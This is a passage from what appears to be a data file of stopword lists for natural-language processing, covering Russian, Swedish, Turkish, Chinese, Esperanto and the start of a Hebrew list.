\"то\",\n        \"тобой\",\n        \"тобою\",\n        \"товарищ\",\n        \"тогда\",\n        \"того\",\n        \"тоже\",\n        \"только\",\n        \"том\",\n        \"тому\",\n        \"тот\",\n        \"тою\",\n        \"третий\",\n        \"три\",\n        \"тринадцатый\",\n        \"тринадцать\",\n        \"ту\",\n        \"туда\",\n        \"тут\",\n        \"ты\",\n        \"тысяч\",\n        \"у\",\n        \"увидеть\",\n        \"уж\",\n        \"уже\",\n        \"улица\",\n        \"уметь\",\n        \"утро\",\n        \"хороший\",\n        \"хорошо\",\n        \"хотеть\",\n        \"хоть\",\n        \"хотя\",\n     
   \"хочешь\",\n        \"час\",\n        \"часто\",\n        \"часть\",\n        \"чаще\",\n        \"чего\",\n        \"человек\",\n        \"чем\",\n        \"чему\",\n        \"через\",\n        \"четвертый\",\n        \"четыре\",\n        \"четырнадцатый\",\n        \"четырнадцать\",\n        \"что\",\n        \"чтоб\",\n        \"чтобы\",\n        \"чуть\",\n        \"шестнадцатый\",\n        \"шестнадцать\",\n        \"шестой\",\n        \"шесть\",\n        \"эта\",\n        \"эти\",\n        \"этим\",\n        \"этими\",\n        \"этих\",\n        \"это\",\n        \"этого\",\n        \"этой\",\n        \"этом\",\n        \"этому\",\n        \"этот\",\n        \"эту\",\n        \"я\",\n    ],\n    \"sv\": [\n        \"aderton\",\n        \"adertonde\",\n        \"adjö\",\n        \"aldrig\",\n        \"alla\",\n        \"allas\",\n        \"allt\",\n        \"alltid\",\n        \"alltså\",\n        \"andra\",\n        \"andras\",\n        \"annan\",\n        \"annat\",\n        \"artonde\",\n        \"artonn\",\n        \"att\",\n        \"av\",\n        \"bakom\",\n        \"bara\",\n        \"behöva\",\n        \"behövas\",\n        \"behövde\",\n        \"behövt\",\n        \"beslut\",\n        \"beslutat\",\n        \"beslutit\",\n        \"bland\",\n        \"blev\",\n        \"bli\",\n        \"blir\",\n        \"blivit\",\n        \"bort\",\n        \"borta\",\n        \"bra\",\n        \"bäst\",\n        \"bättre\",\n        \"båda\",\n        \"bådas\",\n        \"dag\",\n        \"dagar\",\n        \"dagarna\",\n        \"dagen\",\n        \"de\",\n        \"del\",\n        \"delen\",\n        \"dem\",\n        \"den\",\n        \"denna\",\n        \"deras\",\n        \"dess\",\n        \"dessa\",\n        \"det\",\n        \"detta\",\n        \"dig\",\n        \"din\",\n        \"dina\",\n        \"dit\",\n        \"ditt\",\n        \"dock\",\n        \"du\",\n        \"där\",\n        \"därför\",\n        \"då\",\n        \"efter\",\n        
\"eftersom\",\n        \"ej\",\n        \"elfte\",\n        \"eller\",\n        \"elva\",\n        \"en\",\n        \"enkel\",\n        \"enkelt\",\n        \"enkla\",\n        \"enligt\",\n        \"er\",\n        \"era\",\n        \"ert\",\n        \"ett\",\n        \"ettusen\",\n        \"fanns\",\n        \"fem\",\n        \"femte\",\n        \"femtio\",\n        \"femtionde\",\n        \"femton\",\n        \"femtonde\",\n        \"fick\",\n        \"fin\",\n        \"finnas\",\n        \"finns\",\n        \"fjorton\",\n        \"fjortonde\",\n        \"fjärde\",\n        \"fler\",\n        \"flera\",\n        \"flesta\",\n        \"fram\",\n        \"framför\",\n        \"från\",\n        \"fyra\",\n        \"fyrtio\",\n        \"fyrtionde\",\n        \"få\",\n        \"får\",\n        \"fått\",\n        \"följande\",\n        \"för\",\n        \"före\",\n        \"förlåt\",\n        \"förra\",\n        \"första\",\n        \"genast\",\n        \"genom\",\n        \"gick\",\n        \"gjorde\",\n        \"gjort\",\n        \"god\",\n        \"goda\",\n        \"godare\",\n        \"godast\",\n        \"gott\",\n        \"gälla\",\n        \"gäller\",\n        \"gällt\",\n        \"gärna\",\n        \"gå\",\n        \"går\",\n        \"gått\",\n        \"gör\",\n        \"göra\",\n        \"ha\",\n        \"hade\",\n        \"haft\",\n        \"han\",\n        \"hans\",\n        \"har\",\n        \"heller\",\n        \"hellre\",\n        \"helst\",\n        \"helt\",\n        \"henne\",\n        \"hennes\",\n        \"hit\",\n        \"hon\",\n        \"honom\",\n        \"hundra\",\n        \"hundraen\",\n        \"hundraett\",\n        \"hur\",\n        \"här\",\n        \"hög\",\n        \"höger\",\n        \"högre\",\n        \"högst\",\n        \"i\",\n        \"ibland\",\n        \"icke\",\n        \"idag\",\n        \"igen\",\n        \"igår\",\n        \"imorgon\",\n        \"in\",\n        \"inför\",\n        \"inga\",\n        \"ingen\",\n        
\"ingenting\",\n        \"inget\",\n        \"innan\",\n        \"inne\",\n        \"inom\",\n        \"inte\",\n        \"inuti\",\n        \"ja\",\n        \"jag\",\n        \"ju\",\n        \"jämfört\",\n        \"kan\",\n        \"kanske\",\n        \"knappast\",\n        \"kom\",\n        \"komma\",\n        \"kommer\",\n        \"kommit\",\n        \"kr\",\n        \"kunde\",\n        \"kunna\",\n        \"kunnat\",\n        \"kvar\",\n        \"legat\",\n        \"ligga\",\n        \"ligger\",\n        \"lika\",\n        \"likställd\",\n        \"likställda\",\n        \"lilla\",\n        \"lite\",\n        \"liten\",\n        \"litet\",\n        \"länge\",\n        \"längre\",\n        \"längst\",\n        \"lätt\",\n        \"lättare\",\n        \"lättast\",\n        \"långsam\",\n        \"långsammare\",\n        \"långsammast\",\n        \"långsamt\",\n        \"långt\",\n        \"man\",\n        \"med\",\n        \"mellan\",\n        \"men\",\n        \"mer\",\n        \"mera\",\n        \"mest\",\n        \"mig\",\n        \"min\",\n        \"mina\",\n        \"mindre\",\n        \"minst\",\n        \"mitt\",\n        \"mittemot\",\n        \"mot\",\n        \"mycket\",\n        \"många\",\n        \"måste\",\n        \"möjlig\",\n        \"möjligen\",\n        \"möjligt\",\n        \"möjligtvis\",\n        \"ned\",\n        \"nederst\",\n        \"nedersta\",\n        \"nedre\",\n        \"nej\",\n        \"ner\",\n        \"ni\",\n        \"nio\",\n        \"nionde\",\n        \"nittio\",\n        \"nittionde\",\n        \"nitton\",\n        \"nittonde\",\n        \"nog\",\n        \"noll\",\n        \"nr\",\n        \"nu\",\n        \"nummer\",\n        \"när\",\n        \"nästa\",\n        \"någon\",\n        \"någonting\",\n        \"något\",\n        \"några\",\n        \"nödvändig\",\n        \"nödvändiga\",\n        \"nödvändigt\",\n        \"nödvändigtvis\",\n        \"och\",\n        \"också\",\n        \"ofta\",\n        \"oftast\",\n       
 \"olika\",\n        \"olikt\",\n        \"om\",\n        \"oss\",\n        \"på\",\n        \"rakt\",\n        \"redan\",\n        \"rätt\",\n        \"sade\",\n        \"sagt\",\n        \"samma\",\n        \"sedan\",\n        \"senare\",\n        \"senast\",\n        \"sent\",\n        \"sex\",\n        \"sextio\",\n        \"sextionde\",\n        \"sexton\",\n        \"sextonde\",\n        \"sig\",\n        \"sin\",\n        \"sina\",\n        \"sist\",\n        \"sista\",\n        \"siste\",\n        \"sitt\",\n        \"sitta\",\n        \"sju\",\n        \"sjunde\",\n        \"sjuttio\",\n        \"sjuttionde\",\n        \"sjutton\",\n        \"sjuttonde\",\n        \"själv\",\n        \"sjätte\",\n        \"ska\",\n        \"skall\",\n        \"skulle\",\n        \"slutligen\",\n        \"små\",\n        \"smått\",\n        \"snart\",\n        \"som\",\n        \"stor\",\n        \"stora\",\n        \"stort\",\n        \"större\",\n        \"störst\",\n        \"säga\",\n        \"säger\",\n        \"sämre\",\n        \"sämst\",\n        \"så\",\n        \"sådan\",\n        \"sådana\",\n        \"sådant\",\n        \"tack\",\n        \"tidig\",\n        \"tidigare\",\n        \"tidigast\",\n        \"tidigt\",\n        \"till\",\n        \"tills\",\n        \"tillsammans\",\n        \"tio\",\n        \"tionde\",\n        \"tjugo\",\n        \"tjugoen\",\n        \"tjugoett\",\n        \"tjugonde\",\n        \"tjugotre\",\n        \"tjugotvå\",\n        \"tjungo\",\n        \"tolfte\",\n        \"tolv\",\n        \"tre\",\n        \"tredje\",\n        \"trettio\",\n        \"trettionde\",\n        \"tretton\",\n        \"trettonde\",\n        \"två\",\n        \"tvåhundra\",\n        \"under\",\n        \"upp\",\n        \"ur\",\n        \"ursäkt\",\n        \"ut\",\n        \"utan\",\n        \"utanför\",\n        \"ute\",\n        \"vad\",\n        \"var\",\n        \"vara\",\n        \"varför\",\n        \"varifrån\",\n        \"varit\",\n        
\"varje\",\n        \"varken\",\n        \"vars\",\n        \"varsågod\",\n        \"vart\",\n        \"vem\",\n        \"vems\",\n        \"verkligen\",\n        \"vi\",\n        \"vid\",\n        \"vidare\",\n        \"viktig\",\n        \"viktigare\",\n        \"viktigast\",\n        \"viktigt\",\n        \"vilka\",\n        \"vilkas\",\n        \"vilken\",\n        \"vilket\",\n        \"vill\",\n        \"vänster\",\n        \"vänstra\",\n        \"värre\",\n        \"vår\",\n        \"våra\",\n        \"vårt\",\n        \"än\",\n        \"ännu\",\n        \"är\",\n        \"även\",\n        \"åt\",\n        \"åtminstone\",\n        \"åtta\",\n        \"åttio\",\n        \"åttionde\",\n        \"åttonde\",\n        \"över\",\n        \"övermorgon\",\n        \"överst\",\n        \"övre\",\n    ],\n    \"tr\": [\n        \"acaba\",\n        \"acep\",\n        \"adeta\",\n        \"altmýþ\",\n        \"altmış\",\n        \"altý\",\n        \"altı\",\n        \"ama\",\n        \"ancak\",\n        \"arada\",\n        \"artýk\",\n        \"aslında\",\n        \"aynen\",\n        \"ayrıca\",\n        \"az\",\n        \"bana\",\n        \"bari\",\n        \"bazen\",\n        \"bazý\",\n        \"bazı\",\n        \"baţka\",\n        \"belki\",\n        \"ben\",\n        \"benden\",\n        \"beni\",\n        \"benim\",\n        \"beri\",\n        \"beþ\",\n        \"beş\",\n        \"beţ\",\n        \"bile\",\n        \"bin\",\n        \"bir\",\n        \"biraz\",\n        \"biri\",\n        \"birkaç\",\n        \"birkez\",\n        \"birçok\",\n        \"birþey\",\n        \"birþeyi\",\n        \"birşey\",\n        \"birşeyi\",\n        \"birţey\",\n        \"biz\",\n        \"bizden\",\n        \"bize\",\n        \"bizi\",\n        \"bizim\",\n        \"bu\",\n        \"buna\",\n        \"bunda\",\n        \"bundan\",\n        \"bunlar\",\n        \"bunları\",\n        \"bunların\",\n        \"bunu\",\n        \"bunun\",\n        \"burada\",\n        \"böyle\",\n   
     \"böylece\",\n        \"bütün\",\n        \"da\",\n        \"daha\",\n        \"dahi\",\n        \"dahil\",\n        \"daima\",\n        \"dair\",\n        \"dayanarak\",\n        \"de\",\n        \"defa\",\n        \"deđil\",\n        \"değil\",\n        \"diye\",\n        \"diđer\",\n        \"diğer\",\n        \"doksan\",\n        \"dokuz\",\n        \"dolayı\",\n        \"dolayısıyla\",\n        \"dört\",\n        \"edecek\",\n        \"eden\",\n        \"ederek\",\n        \"edilecek\",\n        \"ediliyor\",\n        \"edilmesi\",\n        \"ediyor\",\n        \"elli\",\n        \"en\",\n        \"etmesi\",\n        \"etti\",\n        \"ettiği\",\n        \"ettiğini\",\n        \"eđer\",\n        \"eğer\",\n        \"fakat\",\n        \"gibi\",\n        \"göre\",\n        \"halbuki\",\n        \"halen\",\n        \"hangi\",\n        \"hani\",\n        \"hariç\",\n        \"hatta\",\n        \"hele\",\n        \"hem\",\n        \"henüz\",\n        \"hep\",\n        \"hepsi\",\n        \"her\",\n        \"herhangi\",\n        \"herkes\",\n        \"herkesin\",\n        \"hiç\",\n        \"hiçbir\",\n        \"iken\",\n        \"iki\",\n        \"ila\",\n        \"ile\",\n        \"ilgili\",\n        \"ilk\",\n        \"illa\",\n        \"ise\",\n        \"itibaren\",\n        \"itibariyle\",\n        \"iyi\",\n        \"iyice\",\n        \"için\",\n        \"işte\",\n        \"iţte\",\n        \"kadar\",\n        \"kanýmca\",\n        \"karşın\",\n        \"katrilyon\",\n        \"kendi\",\n        \"kendilerine\",\n        \"kendini\",\n        \"kendisi\",\n        \"kendisine\",\n        \"kendisini\",\n        \"kere\",\n        \"kez\",\n        \"keţke\",\n        \"ki\",\n        \"kim\",\n        \"kimden\",\n        \"kime\",\n        \"kimi\",\n        \"kimse\",\n        \"kýrk\",\n        \"kýsaca\",\n        \"kırk\",\n        \"lakin\",\n        \"madem\",\n        \"međer\",\n        \"milyar\",\n        \"milyon\",\n        \"mu\",\n        
\"mü\",\n        \"mý\",\n        \"mı\",\n        \"nasýl\",\n        \"nasıl\",\n        \"ne\",\n        \"neden\",\n        \"nedenle\",\n        \"nerde\",\n        \"nere\",\n        \"nerede\",\n        \"nereye\",\n        \"nitekim\",\n        \"niye\",\n        \"niçin\",\n        \"o\",\n        \"olan\",\n        \"olarak\",\n        \"oldu\",\n        \"olduklarını\",\n        \"olduğu\",\n        \"olduğunu\",\n        \"olmadı\",\n        \"olmadığı\",\n        \"olmak\",\n        \"olması\",\n        \"olmayan\",\n        \"olmaz\",\n        \"olsa\",\n        \"olsun\",\n        \"olup\",\n        \"olur\",\n        \"olursa\",\n        \"oluyor\",\n        \"on\",\n        \"ona\",\n        \"ondan\",\n        \"onlar\",\n        \"onlardan\",\n        \"onlari\",\n        \"onlarýn\",\n        \"onları\",\n        \"onların\",\n        \"onu\",\n        \"onun\",\n        \"otuz\",\n        \"oysa\",\n        \"pek\",\n        \"rağmen\",\n        \"sadece\",\n        \"sanki\",\n        \"sekiz\",\n        \"seksen\",\n        \"sen\",\n        \"senden\",\n        \"seni\",\n        \"senin\",\n        \"siz\",\n        \"sizden\",\n        \"sizi\",\n        \"sizin\",\n        \"sonra\",\n        \"tarafından\",\n        \"trilyon\",\n        \"tüm\",\n        \"var\",\n        \"vardı\",\n        \"ve\",\n        \"veya\",\n        \"veyahut\",\n        \"ya\",\n        \"yahut\",\n        \"yani\",\n        \"yapacak\",\n        \"yapmak\",\n        \"yaptı\",\n        \"yaptıkları\",\n        \"yaptığı\",\n        \"yaptığını\",\n        \"yapılan\",\n        \"yapılması\",\n        \"yapıyor\",\n        \"yedi\",\n        \"yerine\",\n        \"yetmiþ\",\n        \"yetmiş\",\n        \"yetmiţ\",\n        \"yine\",\n        \"yirmi\",\n        \"yoksa\",\n        \"yüz\",\n        \"zaten\",\n        \"çok\",\n        \"çünkü\",\n        \"öyle\",\n        \"üzere\",\n        \"üç\",\n        \"þey\",\n        \"þeyden\",\n        
\"þeyi\",\n        \"þeyler\",\n        \"þu\",\n        \"þuna\",\n        \"þunda\",\n        \"þundan\",\n        \"þunu\",\n        \"şey\",\n        \"şeyden\",\n        \"şeyi\",\n        \"şeyler\",\n        \"şu\",\n        \"şuna\",\n        \"şunda\",\n        \"şundan\",\n        \"şunları\",\n        \"şunu\",\n        \"şöyle\",\n        \"ţayet\",\n        \"ţimdi\",\n        \"ţu\",\n        \"ţöyle\",\n    ],\n    \"zh\": [\n        \"、\",\n        \"。\",\n        \"〈\",\n        \"〉\",\n        \"《\",\n        \"》\",\n        \"一\",\n        \"一切\",\n        \"一则\",\n        \"一方面\",\n        \"一旦\",\n        \"一来\",\n        \"一样\",\n        \"一般\",\n        \"七\",\n        \"万一\",\n        \"三\",\n        \"上下\",\n        \"不仅\",\n        \"不但\",\n        \"不光\",\n        \"不单\",\n        \"不只\",\n        \"不如\",\n        \"不怕\",\n        \"不惟\",\n        \"不成\",\n        \"不拘\",\n        \"不比\",\n        \"不然\",\n        \"不特\",\n        \"不独\",\n        \"不管\",\n        \"不论\",\n        \"不过\",\n        \"不问\",\n        \"与\",\n        \"与其\",\n        \"与否\",\n        \"与此同时\",\n        \"且\",\n        \"两者\",\n        \"个\",\n        \"临\",\n        \"为\",\n        \"为了\",\n        \"为什么\",\n        \"为何\",\n        \"为着\",\n        \"乃\",\n        \"乃至\",\n        \"么\",\n        \"之\",\n        \"之一\",\n        \"之所以\",\n        \"之类\",\n        \"乌乎\",\n        \"乎\",\n        \"乘\",\n        \"九\",\n        \"也\",\n        \"也好\",\n        \"也罢\",\n        \"了\",\n        \"二\",\n        \"于\",\n        \"于是\",\n        \"于是乎\",\n        \"云云\",\n        \"五\",\n        \"人家\",\n        \"什么\",\n        \"什么样\",\n        \"从\",\n        \"从而\",\n        \"他\",\n        \"他人\",\n        \"他们\",\n        \"以\",\n        \"以便\",\n        \"以免\",\n        \"以及\",\n        \"以至\",\n        \"以至于\",\n        \"以致\",\n        \"们\",\n        \"任\",\n        \"任何\",\n        \"任凭\",\n        \"似的\",\n        \"但\",\n        \"但是\",\n        
\"何\",\n        \"何况\",\n        \"何处\",\n        \"何时\",\n        \"作为\",\n        \"你\",\n        \"你们\",\n        \"使得\",\n        \"例如\",\n        \"依\",\n        \"依照\",\n        \"俺\",\n        \"俺们\",\n        \"倘\",\n        \"倘使\",\n        \"倘或\",\n        \"倘然\",\n        \"倘若\",\n        \"借\",\n        \"假使\",\n        \"假如\",\n        \"假若\",\n        \"像\",\n        \"八\",\n        \"六\",\n        \"兮\",\n        \"关于\",\n        \"其\",\n        \"其一\",\n        \"其中\",\n        \"其二\",\n        \"其他\",\n        \"其余\",\n        \"其它\",\n        \"其次\",\n        \"具体地说\",\n        \"具体说来\",\n        \"再者\",\n        \"再说\",\n        \"冒\",\n        \"冲\",\n        \"况且\",\n        \"几\",\n        \"几时\",\n        \"凭\",\n        \"凭借\",\n        \"则\",\n        \"别\",\n        \"别的\",\n        \"别说\",\n        \"到\",\n        \"前后\",\n        \"前者\",\n        \"加之\",\n        \"即\",\n        \"即令\",\n        \"即使\",\n        \"即便\",\n        \"即或\",\n        \"即若\",\n        \"又\",\n        \"及\",\n        \"及其\",\n        \"及至\",\n        \"反之\",\n        \"反过来\",\n        \"反过来说\",\n        \"另\",\n        \"另一方面\",\n        \"另外\",\n        \"只是\",\n        \"只有\",\n        \"只要\",\n        \"只限\",\n        \"叫\",\n        \"叮咚\",\n        \"可\",\n        \"可以\",\n        \"可是\",\n        \"可见\",\n        \"各\",\n        \"各个\",\n        \"各位\",\n        \"各种\",\n        \"各自\",\n        \"同\",\n        \"同时\",\n        \"向\",\n        \"向着\",\n        \"吓\",\n        \"吗\",\n        \"否则\",\n        \"吧\",\n        \"吧哒\",\n        \"吱\",\n        \"呀\",\n        \"呃\",\n        \"呕\",\n        \"呗\",\n        \"呜\",\n        \"呜呼\",\n        \"呢\",\n        \"呵\",\n        \"呸\",\n        \"呼哧\",\n        \"咋\",\n        \"和\",\n        \"咚\",\n        \"咦\",\n        \"咱\",\n        \"咱们\",\n        \"咳\",\n        \"哇\",\n        \"哈\",\n        \"哈哈\",\n        \"哉\",\n        \"哎\",\n        \"哎呀\",\n        \"哎哟\",\n        \"哗\",\n        
\"哟\",\n        \"哦\",\n        \"哩\",\n        \"哪\",\n        \"哪个\",\n        \"哪些\",\n        \"哪儿\",\n        \"哪天\",\n        \"哪年\",\n        \"哪怕\",\n        \"哪样\",\n        \"哪边\",\n        \"哪里\",\n        \"哼\",\n        \"哼唷\",\n        \"唉\",\n        \"啊\",\n        \"啐\",\n        \"啥\",\n        \"啦\",\n        \"啪达\",\n        \"喂\",\n        \"喏\",\n        \"喔唷\",\n        \"嗡嗡\",\n        \"嗬\",\n        \"嗯\",\n        \"嗳\",\n        \"嘎\",\n        \"嘎登\",\n        \"嘘\",\n        \"嘛\",\n        \"嘻\",\n        \"嘿\",\n        \"四\",\n        \"因\",\n        \"因为\",\n        \"因此\",\n        \"因而\",\n        \"固然\",\n        \"在\",\n        \"在下\",\n        \"地\",\n        \"多\",\n        \"多少\",\n        \"她\",\n        \"她们\",\n        \"如\",\n        \"如上所述\",\n        \"如何\",\n        \"如其\",\n        \"如果\",\n        \"如此\",\n        \"如若\",\n        \"宁\",\n        \"宁可\",\n        \"宁愿\",\n        \"宁肯\",\n        \"它\",\n        \"它们\",\n        \"对\",\n        \"对于\",\n        \"将\",\n        \"尔后\",\n        \"尚且\",\n        \"就\",\n        \"就是\",\n        \"就是说\",\n        \"尽\",\n        \"尽管\",\n        \"岂但\",\n        \"己\",\n        \"并\",\n        \"并且\",\n        \"开外\",\n        \"开始\",\n        \"归\",\n        \"当\",\n        \"当着\",\n        \"彼\",\n        \"彼此\",\n        \"往\",\n        \"待\",\n        \"得\",\n        \"怎\",\n        \"怎么\",\n        \"怎么办\",\n        \"怎么样\",\n        \"怎样\",\n        \"总之\",\n        \"总的来看\",\n        \"总的来说\",\n        \"总的说来\",\n        \"总而言之\",\n        \"恰恰相反\",\n        \"您\",\n        \"慢说\",\n        \"我\",\n        \"我们\",\n        \"或\",\n        \"或是\",\n        \"或者\",\n        \"所\",\n        \"所以\",\n        \"打\",\n        \"把\",\n        \"抑或\",\n        \"拿\",\n        \"按\",\n        \"按照\",\n        \"换句话说\",\n        \"换言之\",\n        \"据\",\n        \"接着\",\n        \"故\",\n        \"故此\",\n        \"旁人\",\n        \"无宁\",\n        \"无论\",\n        \"既\",\n   
     \"既是\",\n        \"既然\",\n        \"时候\",\n        \"是\",\n        \"是的\",\n        \"替\",\n        \"有\",\n        \"有些\",\n        \"有关\",\n        \"有的\",\n        \"望\",\n        \"朝\",\n        \"朝着\",\n        \"本\",\n        \"本着\",\n        \"来\",\n        \"来着\",\n        \"极了\",\n        \"果然\",\n        \"果真\",\n        \"某\",\n        \"某个\",\n        \"某些\",\n        \"根据\",\n        \"正如\",\n        \"此\",\n        \"此外\",\n        \"此间\",\n        \"毋宁\",\n        \"每\",\n        \"每当\",\n        \"比\",\n        \"比如\",\n        \"比方\",\n        \"沿\",\n        \"沿着\",\n        \"漫说\",\n        \"焉\",\n        \"然则\",\n        \"然后\",\n        \"然而\",\n        \"照\",\n        \"照着\",\n        \"甚么\",\n        \"甚而\",\n        \"甚至\",\n        \"用\",\n        \"由\",\n        \"由于\",\n        \"由此可见\",\n        \"的\",\n        \"的话\",\n        \"相对而言\",\n        \"省得\",\n        \"着\",\n        \"着呢\",\n        \"矣\",\n        \"离\",\n        \"第\",\n        \"等\",\n        \"等等\",\n        \"管\",\n        \"紧接着\",\n        \"纵\",\n        \"纵令\",\n        \"纵使\",\n        \"纵然\",\n        \"经\",\n        \"经过\",\n        \"结果\",\n        \"给\",\n        \"继而\",\n        \"综上所述\",\n        \"罢了\",\n        \"者\",\n        \"而\",\n        \"而且\",\n        \"而况\",\n        \"而外\",\n        \"而已\",\n        \"而是\",\n        \"而言\",\n        \"能\",\n        \"腾\",\n        \"自\",\n        \"自个儿\",\n        \"自从\",\n        \"自各儿\",\n        \"自家\",\n        \"自己\",\n        \"自身\",\n        \"至\",\n        \"至于\",\n        \"若\",\n        \"若是\",\n        \"若非\",\n        \"莫若\",\n        \"虽\",\n        \"虽则\",\n        \"虽然\",\n        \"虽说\",\n        \"被\",\n        \"要\",\n        \"要不\",\n        \"要不是\",\n        \"要不然\",\n        \"要么\",\n        \"要是\",\n        \"让\",\n        \"论\",\n        \"设使\",\n        \"设若\",\n        \"该\",\n        \"诸位\",\n        \"谁\",\n        \"谁知\",\n        \"赶\",\n        \"起\",\n        \"起见\",\n        
\"趁\",\n        \"趁着\",\n        \"越是\",\n        \"跟\",\n        \"较\",\n        \"较之\",\n        \"边\",\n        \"过\",\n        \"还是\",\n        \"还有\",\n        \"这\",\n        \"这个\",\n        \"这么\",\n        \"这么些\",\n        \"这么样\",\n        \"这么点儿\",\n        \"这些\",\n        \"这会儿\",\n        \"这儿\",\n        \"这就是说\",\n        \"这时\",\n        \"这样\",\n        \"这边\",\n        \"这里\",\n        \"进而\",\n        \"连\",\n        \"连同\",\n        \"通过\",\n        \"遵照\",\n        \"那\",\n        \"那个\",\n        \"那么\",\n        \"那么些\",\n        \"那么样\",\n        \"那些\",\n        \"那会儿\",\n        \"那儿\",\n        \"那时\",\n        \"那样\",\n        \"那边\",\n        \"那里\",\n        \"鄙人\",\n        \"鉴于\",\n        \"阿\",\n        \"除\",\n        \"除了\",\n        \"除此之外\",\n        \"除非\",\n        \"随\",\n        \"随着\",\n        \"零\",\n        \"非但\",\n        \"非徒\",\n        \"靠\",\n        \"顺\",\n        \"顺着\",\n        \"首先\",\n        \"︿\",\n        \"！\",\n        \"＃\",\n        \"＄\",\n        \"％\",\n        \"＆\",\n        \"（\",\n        \"）\",\n        \"＊\",\n        \"＋\",\n        \"，\",\n        \"０\",\n        \"１\",\n        \"２\",\n        \"３\",\n        \"４\",\n        \"５\",\n        \"６\",\n        \"７\",\n        \"８\",\n        \"９\",\n        \"：\",\n        \"；\",\n        \"＜\",\n        \"＞\",\n        \"？\",\n        \"＠\",\n        \"［\",\n        \"］\",\n        \"｛\",\n        \"｜\",\n        \"｝\",\n        \"～\",\n        \"￥\",\n    ],\n    \"eo\": [\n        \"adiaŭ\",\n        \"ajn\",\n        \"al\",\n        \"ankoraŭ\",\n        \"antaŭ\",\n        \"aŭ\",\n        \"bonan\",\n        \"bonvole\",\n        \"bonvolu\",\n        \"bv\",\n        \"ci\",\n        \"cia\",\n        \"cian\",\n        \"cin\",\n        \"d-ro\",\n        \"da\",\n        \"de\",\n        \"dek\",\n        \"deka\",\n        \"do\",\n        \"doktor'\",\n        \"doktoro\",\n        \"du\",\n        \"dua\",\n        \"dum\",\n   
     \"eble\",\n        \"ekz\",\n        \"ekzemple\",\n        \"en\",\n        \"estas\",\n        \"estis\",\n        \"estos\",\n        \"estu\",\n        \"estus\",\n        \"eĉ\",\n        \"f-no\",\n        \"feliĉan\",\n        \"for\",\n        \"fraŭlino\",\n        \"ha\",\n        \"havas\",\n        \"havis\",\n        \"havos\",\n        \"havu\",\n        \"havus\",\n        \"he\",\n        \"ho\",\n        \"hu\",\n        \"ili\",\n        \"ilia\",\n        \"ilian\",\n        \"ilin\",\n        \"inter\",\n        \"io\",\n        \"ion\",\n        \"iu\",\n        \"iujn\",\n        \"iun\",\n        \"ja\",\n        \"jam\",\n        \"je\",\n        \"jes\",\n        \"k\",\n        \"kaj\",\n        \"ke\",\n        \"kio\",\n        \"kion\",\n        \"kiu\",\n        \"kiujn\",\n        \"kiun\",\n        \"kvankam\",\n        \"kvar\",\n        \"kvara\",\n        \"kvazaŭ\",\n        \"kvin\",\n        \"kvina\",\n        \"la\",\n        \"li\",\n        \"lia\",\n        \"lian\",\n        \"lin\",\n        \"malantaŭ\",\n        \"male\",\n        \"malgraŭ\",\n        \"mem\",\n        \"mi\",\n        \"mia\",\n        \"mian\",\n        \"min\",\n        \"minus\",\n        \"naŭ\",\n        \"naŭa\",\n        \"ne\",\n        \"nek\",\n        \"nenio\",\n        \"nenion\",\n        \"neniu\",\n        \"neniun\",\n        \"nepre\",\n        \"ni\",\n        \"nia\",\n        \"nian\",\n        \"nin\",\n        \"nu\",\n        \"nun\",\n        \"nur\",\n        \"ok\",\n        \"oka\",\n        \"oni\",\n        \"onia\",\n        \"onian\",\n        \"onin\",\n        \"plej\",\n        \"pli\",\n        \"plu\",\n        \"plus\",\n        \"por\",\n        \"post\",\n        \"preter\",\n        \"s-no\",\n        \"s-ro\",\n        \"se\",\n        \"sed\",\n        \"sep\",\n        \"sepa\",\n        \"ses\",\n        \"sesa\",\n        \"si\",\n        \"sia\",\n        \"sian\",\n        \"sin\",\n        
\"sinjor'\",\n        \"sinjorino\",\n        \"sinjoro\",\n        \"sub\",\n        \"super\",\n        \"supren\",\n        \"sur\",\n        \"tamen\",\n        \"tio\",\n        \"tion\",\n        \"tiu\",\n        \"tiujn\",\n        \"tiun\",\n        \"tra\",\n        \"tri\",\n        \"tria\",\n        \"tuj\",\n        \"tute\",\n        \"unu\",\n        \"unua\",\n        \"ve\",\n        \"verŝajne\",\n        \"vi\",\n        \"via\",\n        \"vian\",\n        \"vin\",\n        \"ĉi\",\n        \"ĉio\",\n        \"ĉion\",\n        \"ĉiu\",\n        \"ĉiujn\",\n        \"ĉiun\",\n        \"ĉu\",\n        \"ĝi\",\n        \"ĝia\",\n        \"ĝian\",\n        \"ĝin\",\n        \"ĝis\",\n        \"ĵus\",\n        \"ŝi\",\n        \"ŝia\",\n        \"ŝin\",\n    ],\n    \"he\": [\n        \"אבל\",\n        \"או\",\n        \"אולי\",\n        \"אותה\",\n        \"אותו\",\n        \"אותי\",\n        \"אותך\",\n        \"אותם\",\n        \"אותן\",\n        \"אותנו\",\n        \"אז\",\n        \"אחר\",\n        \"אחרות\",\n        \"אחרי\",\n        \"אחריכן\",\n        \"אחרים\",\n        \"אחרת\",\n        \"אי\",\n        \"איזה\",\n        \"איך\",\n        \"אין\",\n        \"איפה\",\n        \"איתה\",\n        \"איתו\",\n        \"איתי\",\n        \"איתך\",\n        \"איתכם\",\n        \"איתכן\",\n        \"איתם\",\n        \"איתן\",\n        \"איתנו\",\n        \"אך\",\n        \"אל\",\n        \"אלה\",\n        \"אלו\",\n        \"אם\",\n        \"אנחנו\",\n        \"אני\",\n        \"אס\",\n        \"אף\",\n        \"אצל\",\n        \"אשר\",\n        \"את\",\n        \"אתה\",\n        \"אתכם\",\n        \"אתכן\",\n        \"אתם\",\n        \"אתן\",\n        \"באיזומידה\",\n        \"באמצע\",\n        \"באמצעות\",\n        \"בגלל\",\n        \"בין\",\n        \"בלי\",\n        \"במידה\",\n        \"במקוםשבו\",\n        \"ברם\",\n        \"בשביל\",\n        \"בשעהש\",\n        \"בתוך\",\n        \"גם\",\n        \"דרך\",\n        \"הוא\",\n        
